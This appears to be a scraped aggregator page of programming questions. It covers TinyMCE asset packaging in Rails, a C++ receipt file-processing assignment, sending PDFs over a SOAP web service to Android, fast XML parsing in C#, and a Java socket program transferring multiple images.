    When I include the asset-packaged file and load the page (in production) I get the following errors:

      "Ajax.InPlaceEditor is undefined"
      "Ajax.InPlaceRichEditor is not a constructor"

    Can anyone shed some light on where I am going wrong, or share a better way to asset-package tinymce? Thanks!

    Read the article

  • C++ reading and writing and writing files

    - by user320950
    Write a program that processes a list of items purchased with a receipt List in itemlist.txt just items different numbers Prices in pricelist.txt have items and prices in them, different # Make file output file that has receipt Print message saying program ran- have not done If item not in pricelist, report error, count errors display at end Don't know how many items or prices Close file and clear because of running many these files many times This program wont write to the files like so the above is what i have to do #include<iostream>`enter code here` #include<fstream> #include<cstdlib> #include<iomanip> using namespace std; int main() { ifstream in_stream; // reads itemlist.txt ofstream out_stream1; // writes in items.txt ifstream in_stream2; // reads pricelist.txt ofstream out_stream3;// writes in plist.txt ifstream in_stream4;// read recipt.txt ofstream out_stream5;// write display.txt double price=' ',curr_total=0.0; int wrong=0; int itemnum=' '; char next; in_stream.open("ITEMLIST.txt", ios::in); // list of avaliable items out_stream1.open("listWititems.txt", ios::out); // list of avaliable items in_stream2.open("PRICELIST.txt", ios::in); out_stream3.open("listWitdollars.txt", ios::out); in_stream4.open("display.txt", ios::in); out_stream5.open("showitems.txt", ios::out); in_stream.setf(ios::fixed); while(!in_stream.eof()) { in_stream >> itemnum; cin.clear(); cin >> next; } out_stream1.setf(ios::fixed); while (!out_stream1.eof()) { out_stream1 << itemnum; cin.clear(); cin >> next; } in_stream2.setf(ios::fixed); in_stream2.setf(ios::showpoint); in_stream2.precision(2); while (!in_stream2.eof()) // reads file to end of file { while((price== (price*1.00)) && (itemnum == (itemnum*1))) { in_stream2 >> itemnum >> price; itemnum++; price++; curr_total= price++; in_stream2 >> curr_total; cin.clear(); // allows more reading cin >> next; return itemnum, price; } } out_stream3.setf(ios::fixed); out_stream3.setf(ios::showpoint); out_stream3.precision(2); while (!out_stream3.eof()) // reads file to end of file { while((price== (price*1.00)) && (itemnum == (itemnum*1))) { out_stream3 << itemnum << price; itemnum++; price++; curr_total= price++; out_stream3 << curr_total; cin.clear(); // allows more reading cin >> next; return itemnum, price; } } in_stream4.setf(ios::fixed); in_stream4.setf(ios::showpoint); in_stream4.precision(2); while (!in_stream4.eof()) { in_stream4 >> itemnum >> price >> curr_total; cin.clear(); cin >> next; } out_stream5.setf(ios::fixed); out_stream5.setf(ios::showpoint); out_stream5.precision(2); out_stream5 <<setw(5)<< " itemnum " <<setw(5)<<" price "<<setw(5)<<" curr_total " <<endl; // sends items and prices to receipt.txt out_stream5 << setw(5) << itemnum << setw(5) <<price << setw(5)<< curr_total; // sends items and prices to receipt.txt out_stream5 << " You have a total of " << wrong++ << " errors " << endl; in_stream.close(); // closing files. out_stream1.close(); in_stream2.close(); out_stream3.close(); in_stream4.close(); out_stream5.close(); system("pause"); }

    Read the article

  • Sending the files (At least 11 files) from folder through web service to android app.

    - by Shashank_Itmaster
    Hello All, I stuck in middle of this situation,Please help me out. My question is that I want to send files (Total 11 PDF Files) to android app using web service. I tried it with below code.Main Class from which web service is created public class MultipleFilesImpl implements MultipleFiles { public FileData[] sendPDFs() { FileData fileData = null; // List<FileData> filesDetails = new ArrayList<FileData>(); File fileFolder = new File( "C:/eclipse/workspace/AIPWebService/src/pdfs/"); // File fileTwo = new File( // "C:/eclipse/workspace/AIPWebService/src/simple.pdf"); File sendFiles[] = fileFolder.listFiles(); // sendFiles[0] = fileOne; // sendFiles[1] = fileTwo; DataHandler handler = null; char[] readLine = null; byte[] data = null; int offset = 0; int numRead = 0; InputStream stream = null; FileOutputStream outputStream = null; FileData[] filesData = null; try { System.out.println("Web Service Called Successfully"); for (int i = 0; i < sendFiles.length; i++) { handler = new DataHandler(new FileDataSource(sendFiles[i])); fileData = new FileData(); data = new byte[(int) sendFiles[i].length()]; stream = handler.getInputStream(); while (offset < data.length && (numRead = stream.read(data, offset, data.length - offset)) >= 0) { offset += numRead; } readLine = Base64Coder.encode(data); offset = 0; numRead = 0; System.out.println("'Reading File............................"); System.out.println("\n"); System.out.println(readLine); System.out.println("Data Reading Successful"); fileData.setFileName(sendFiles[i].getName()); fileData.setFileData(String.valueOf(readLine)); readLine = null; System.out.println("Data from bean " + fileData.getFileData()); outputStream = new FileOutputStream("D:/" + sendFiles[i].getName()); outputStream.write(Base64Coder.decode(fileData.getFileData())); outputStream.flush(); outputStream.close(); stream.close(); // FileData fileDetails = new FileData(); // fileDetails = fileData; // filesDetails.add(fileData); filesData = new FileData[(int) sendFiles[i].length()]; } // return fileData; } catch (FileNotFoundException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } catch (Exception e) { e.printStackTrace(); } return filesData; } } Also The Interface MultipleFiles:- public interface MultipleFiles extends Remote { public FileData[] sendPDFs() throws FileNotFoundException, IOException, Exception; } Here I am sending an array of bean "File Data",having properties viz. FileData & FileName. FileData- contains file data in encoded. FileName- encoded file name. The Bean:- (FileData) public class FileData { private String fileName; private String fileData; public String getFileName() { return fileName; } public void setFileName(String fileName) { this.fileName = fileName; } public String getFileData() { return fileData; } public void setFileData(String string) { this.fileData = string; } } The android DDMS gives out of memory exception when tried below code & when i tried to send two files then only first file is created. public class PDFActivity extends Activity { private final String METHOD_NAME = "sendPDFs"; private final String NAMESPACE = "http://webservice.uks.com/"; private final String SOAP_ACTION = NAMESPACE + METHOD_NAME; private final String URL = "http://192.168.1.123:8080/AIPWebService/services/MultipleFilesImpl"; /** Called when the activity is first created. 
*/ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); TextView textViewOne = (TextView) findViewById(R.id.textViewOne); try { SoapObject soapObject = new SoapObject(NAMESPACE, METHOD_NAME); SoapSerializationEnvelope envelope = new SoapSerializationEnvelope( SoapEnvelope.VER11); envelope.setOutputSoapObject(soapObject); textViewOne.setText("Web Service Started"); AndroidHttpTransport httpTransport = new AndroidHttpTransport(URL); httpTransport.call(SOAP_ACTION, envelope); // SoapObject result = (SoapObject) envelope.getResponse(); Object result = envelope.getResponse(); Log.i("Result", result.toString()); // String fileName = result.getProperty("fileName").toString(); // String fileData = result.getProperty("fileData").toString(); // Log.i("File Name", fileName); // Log.i("File Data", fileData); // File pdfFile = new File(fileName); // FileOutputStream outputStream = // openFileOutput(pdfFile.toString(), // MODE_PRIVATE); // outputStream.write(Base64Coder.decode(fileData)); Log.i("File", "File Created"); // textViewTwo.setText(result); // Object result = envelope.getResponse(); // FileOutputStream outputStream = openFileOutput(name, mode) } catch (Exception e) { e.printStackTrace(); } } } Please help with some explanation or changes in my code. Thanks in Advance.

    Read the article

  • Fastest way to parse XML files in C#?

    - by LifeH2O
    I have to load many XML files from internet. But for testing with better speed i downloaded all of them (more than 500 files) of the following format. <player-profile> <personal-information> <id>36</id> <fullname>Adam Gilchrist</fullname> <majorteam>Australia</majorteam> <nickname>Gilchrist</nickname> <shortName>A Gilchrist</shortName> <dateofbirth>Nov 14, 1971</dateofbirth> <battingstyle>Left-hand bat</battingstyle> <bowlingstyle>Right-arm offbreak</bowlingstyle> <role>Wicket-Keeper</role> <teams-played-for>Western Australia, New South Wales, ICC World XI, Deccan Chargers, Australia</teams-played-for> <iplteam>Deccan Chargers</iplteam> </personal-information> <batting-statistics> <odi-stats> <matchtype>ODI</matchtype> <matches>287</matches> <innings>279</innings> <notouts>11</notouts> <runsscored>9619</runsscored> <highestscore>172</highestscore> <ballstaken>9922</ballstaken> <sixes>149</sixes> <fours>1000+</fours> <ducks>0</ducks> <fifties>55</fifties> <catches>417</catches> <stumpings>55</stumpings> <hundreds>16</hundreds> <strikerate>96.95</strikerate> <average>35.89</average> </odi-stats> <test-stats> . . . </test-stats> <t20-stats> . . . </t20-stats> <ipl-stats> . . . </ipl-stats> </batting-statistics> <bowling-statistics> <odi-stats> . . . </odi-stats> <test-stats> . . . </test-stats> <t20-stats> . . . </t20-stats> <ipl-stats> . . . </ipl-stats> </bowling-statistics> </player-profile> I am using XmlNodeList list = _document.SelectNodes("/player-profile/batting-statistics/odi-stats"); And then loop this list with foreach as foreach (XmlNode stats in list) { _btMatchType = GetInnerString(stats, "matchtype"); //it returns null string if node not availible . . . . _btAvg = Convert.ToDouble(stats["average"].InnerText); } Even i am loading all files offline, parsing is very slow Is there any good faster way to parse them? Or is it problem with SQL? I am saving all extracted data from XML to database using DataSets, TableAdapters with insert command. I

    Read the article

  • Java Client-Server problem when sending multiple files

    - by Jim
    Client public void transferImage() { File file = new File(ServerStats.clientFolder); String[] files = file.list(); int numFiles = files.length; boolean done = false; BufferedInputStream bis; BufferedOutputStream bos; int num; byte[] byteArray; long count; long len; Socket socket = null ; while (!done){ try{ socket = new Socket(ServerStats.imgServerName,ServerStats.imgServerPort) ; InputStream inStream = socket.getInputStream() ; OutputStream outStream = socket.getOutputStream() ; System.out.println("Connected to : " + ServerStats.imgServerName); BufferedReader inm = new BufferedReader(new InputStreamReader(inStream)); PrintWriter out = new PrintWriter(outStream, true /* autoFlush */); for (int itor = 0; itor < numFiles; itor++) { String fileName = files[itor]; System.out.println("transfer: " + fileName); File sentFile = new File(fileName); len = sentFile.length(); len++; System.out.println(len); out.println(len); out.println(sentFile); //SENDFILE bis = new BufferedInputStream(new FileInputStream(fileName)); bos = new BufferedOutputStream(socket.getOutputStream( )); byteArray = new byte[1000000]; count = 0; while ( count < len ){ num = bis.read(byteArray); bos.write(byteArray,0,num); count++; } bos.close(); bis.close(); System.out.println("file done: " + itor); } done = true; }catch (Exception e) { System.err.println(e) ; } } } Server public static void main(String[] args) { BufferedInputStream bis; BufferedOutputStream bos; int num; File file = new File(ServerStats.serverFolder); if (!(file.exists())){ file.mkdir(); } try { int i = 1; ServerSocket socket = new ServerSocket(ServerStats.imgServerPort); Socket incoming = socket.accept(); System.out.println("Spawning " + i); try { try{ if (!(file.exists())){ file.mkdir(); } InputStream inStream = incoming.getInputStream(); OutputStream outStream = incoming.getOutputStream(); BufferedReader inm = new BufferedReader(new InputStreamReader(inStream)); PrintWriter out = new PrintWriter(outStream, true /* autoFlush */); String length2 = inm.readLine(); System.out.println(length2); String filename = inm.readLine(); System.out.println("Filename = " + filename); out.println("ACK: Filename received = " + filename); //RECIEVE and WRITE FILE byte[] receivedData = new byte[1000000]; bis = new BufferedInputStream(incoming.getInputStream()); bos = new BufferedOutputStream(new FileOutputStream(ServerStats.serverFolder + "/" + filename)); long length = (long)Integer.parseInt(length2); length++; long counter = 0; while (counter < length){ num = bis.read(receivedData); bos.write(receivedData,0,num); counter ++; } System.out.println(counter); bos.close(); bis.close(); File receivedFile = new File(filename); long receivedLen = receivedFile.length(); out.println("ACK: Length of received file = " + receivedLen); } finally { incoming.close(); } } catch (IOException e){ e.printStackTrace(); } } catch (IOException e1){ e1.printStackTrace(); } } The code is some I found, and I have slightly modified it, but I am having problems transferring multiple images over the server. Output on Client: run ServerQueue.Client Connected to : localhost transfer: Picture 012.jpg 1312743 java.lang.ArrayIndexOutOfBoundsException Connected to : localhost transfer: Picture 012.jpg 1312743 Cant seem to get it to transfer multiple images. But bothsides I think crash or something because the file never finishes transfering

    Read the article
